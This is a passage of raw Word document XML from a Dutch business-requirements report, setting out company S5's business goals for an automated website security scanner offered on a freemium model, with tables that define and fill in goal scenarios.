        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3478BBC6" w14:textId="16B7BD7E" w:rsidR="00F57812" w:rsidRPr="00323E0B" w:rsidRDefault="00394B19" w:rsidP="00322D15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252128256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E61D0EB" wp14:editId="292E85F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912321</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1372609</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="50" name="Rectangle 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7E8D3" id="Rectangle 50" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-108.05pt;width:25pt;height:1031.7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DV9ZgCAAC0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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0062121F">
        <w:t xml:space="preserve">2.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="001F01DB">
        <w:t>Business Doelen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA27D80" w14:textId="748F26B7" w:rsidR="0048146D" w:rsidRDefault="001F01DB" w:rsidP="0048146D">
      <w:r>
        <w:t>Wat zijn de Business Doelen</w:t>
      </w:r>
      <w:r w:rsidR="0048146D">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B565BA" w14:textId="18355D71" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
      <w:r>
        <w:t xml:space="preserve">Wat wilt S5 bereiken met dit systeem in het kader van Business?   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C5C52" w14:textId="5BF8F4F7" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
      <w:r>
        <w:t>S5 wilt een systeem bouwen met als hoofddoel een g</w:t>
      </w:r>
      <w:r w:rsidR="000455C5">
        <w:t>eautomatiseerde website-</w:t>
      </w:r>
      <w:r w:rsidR="006907A9">
        <w:t>applicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanner aan te bieden. S5 is een onderneming en wilt graag dat het blijft groeien en uitbreiden. De business goals zijn zeer algemeen en ga</w:t>
      </w:r>
      <w:r w:rsidR="009A4374">
        <w:t>ngbaar bij veel bedrijven, welk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserv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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Services aanbod uitbreiden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0743B894" w14:textId="5EF8B0A0" w:rsidR="00323E0B" w:rsidRDefault="0048146D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="009A0ED0">
        <w:t>servicekwaliteit verbeteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30246FE5" w14:textId="77777777" w:rsidR="00323E0B" w:rsidRDefault="00323E0B" w:rsidP="00323E0B"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="9348" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1552"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr w:rsidR="0009518F" w14:paraId="7CCE9F75"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09518F" w14:paraId="382B175E"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9D7669F"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en geautomatiseerde </w:t>
            </w:r>
            <w:r w:rsidR="00650BF0">
              <w:t>webapplicatie scanner</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> aan te bieden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F6376FA" w14:textId="75D8024D" w:rsidR="008576FB" w:rsidRDefault="008576FB"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Het toepassen van de Freemium verdienmodel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465F3DC0" w14:textId="77777777"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09518F" w14:paraId="02DF7AEC" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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2BB8D408" w:rsidR="0048146D" w:rsidRDefault="00096F81"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apporten genereren</w:t>
            </w:r>
            <w:r w:rsidR="0048146D">
              <w:t xml:space="preserve"> op basis van de geïdentificeerde kwetsbaarheden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="439A5D7A" w14:textId="5480201F"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Website verbeteren met de aanbevelingen van het </w:t>
            </w:r>
            <w:r w:rsidR="00221AD7">
              <w:t>securityrapport</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1400E04C" w14:textId="77777777"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GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3143"/>
        <w:gridCol w:w="3809"/>
      </w:tblGrid>
      <w:tr w:rsidR="0022178C" w14:paraId="5944ED07"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2628037C" w14:textId="3DCC5D6B" w:rsidR="00287FD9" w:rsidRDefault="008F62A4" w:rsidP="008F62A4">
            <w:r>
              <w:t>Doel Subject (DS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681A6FEE" w14:textId="39421573" w:rsidR="00287FD9" w:rsidRDefault="0022178C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De stakeholder die eigenaar is van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="29A372E8"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44461124" w14:textId="6428B79F" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Doel Object (DO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0C659F" w14:textId="78159A7D" w:rsidR="00287FD9" w:rsidRDefault="0022178C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">De entiteit </w:t>
            </w:r>
            <w:r w:rsidR="00C93968">
              <w:t>van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="76FD4B8E" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7C0891" w14:textId="290E8164" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Omgeving (O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77619E28" w14:textId="6B9500D6" w:rsidR="00287FD9" w:rsidRDefault="003B62E0">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De context van het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="10E718FB"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E487D7F" w14:textId="42447BF4" w:rsidR="00287FD9" w:rsidRDefault="008F62A4">
            <w:r>
              <w:t>Doel (D)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E03552A" w14:textId="6D5E68E6" w:rsidR="00287FD9" w:rsidRDefault="001728BC">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het doel zelf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="07743F14" w14:textId="77777777" w:rsidTr="005A427C">
        <w:trPr>
          <w:trHeight w:val="292"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3143" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CB61E3E" w14:textId="3D898E5C" w:rsidR="00287FD9" w:rsidRDefault="008F62A4" w:rsidP="008F62A4">
            <w:r>
              <w:t>Doel Maatregel (DM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B2E7D2" w14:textId="4831085D" w:rsidR="00287FD9" w:rsidRDefault="00345C69">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Het succes criteria van het doel </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022178C" w14:paraId="0F275A85" w14:textId="77777777" w:rsidTr="005A427C">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Pr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Achtergrond informatie over het doel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04FEFE2B" w14:textId="3C1D42A9" w:rsidR="000F2404" w:rsidRDefault="00272E09">
      <w:r>
        <w:t>Tabel 2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD2E9E" w14:textId="56370855" w:rsidR="000F2404" w:rsidRDefault="000F2404">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="1013"/>
        <w:tblW w:w="9773" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1789"/>
        <w:gridCol w:w="4393"/>
        <w:gridCol w:w="3591"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B7C65" w14:paraId="09C636CA" w14:textId="77777777" w:rsidTr="00BD5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1FE7C35D" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Doel Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193E8BDF" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">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Informele business doel statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F88AFA0" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">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Business Doel Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7C65" w14:paraId="67CD96E7" w14:textId="77777777" w:rsidTr="00BD5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14309690" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00503AB1" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Service aanbod uitbreiden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270CC81D" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">We moeten de service aanbod uitbreiden door een geautomatiseerde </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Webapplicatie scanner</w:t>
            </w:r>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> te introduceren.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3065C40C" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B1ECD16" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00503AB1" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>(Waarmee iedere gebruiker een gratis scan kan uitvoeren op basis van de Freemium verdienmodel en de gebruiker de optie geven om een Premiumaccount aan te schaffen.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3591" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3365"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7C65" w14:paraId="0110230E" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="77AE9ED4" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="0073200F" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DS: S5</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="7E417D80" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="631D8343" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001F51D9" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DO: Webapplicatie scanner</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="78BFD8F6" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="31788CD7" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00351F2E" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>O: Service aanbod uitbreiden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="7BBC38A4" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="72F352CB" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00316498" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>D: Een nieuwe service aanbieden</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="71A613AC" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7ED5F85D" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001849E7" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DM: Klanten kunnen een gratis geautomatiseerde scan uitvoeren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w14:paraId="3EC50268" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0B4DB27C" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00232CA1" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>AI: S5 wilt de klanten een tool aanbieden om hun websites te scannen op security</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="26FA34F0" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7C65" w14:paraId="14A5738E" w14:textId="77777777" w:rsidTr="00BD5AD1">
        <w:trPr>
          <w:trHeight w:val="3241"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1789" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55231334" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="008E079D" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Het servicekwaliteit verbeteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA49253" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="007868ED" w:rsidRDefault="002B7C65" w:rsidP="00BD5AD1">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>We moeten naast het ontwikkelen van websites ook meer de focus leggen op security door de gebruiker/klant meer inzicht te bieden op de security staat van hun webshop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3591" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3365"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="0073200F" w14:paraId="06E8B815" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6D8E4B39" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="0073200F" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DS: S5</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="001F51D9" w14:paraId="4C0F87B5" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="28EAA02C" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="001F51D9" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>DO: Security Rapport</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B7C65" w:rsidRPr="00351F2E" w14:paraId="5101FB4D" w14:textId="77777777" w:rsidTr="00484743">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3471" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0AD60EC9" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="00351F2E" w:rsidRDefault="002B7C65" w:rsidP="00331668">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="1013"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>O: Kwaliteit service verbeteren</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
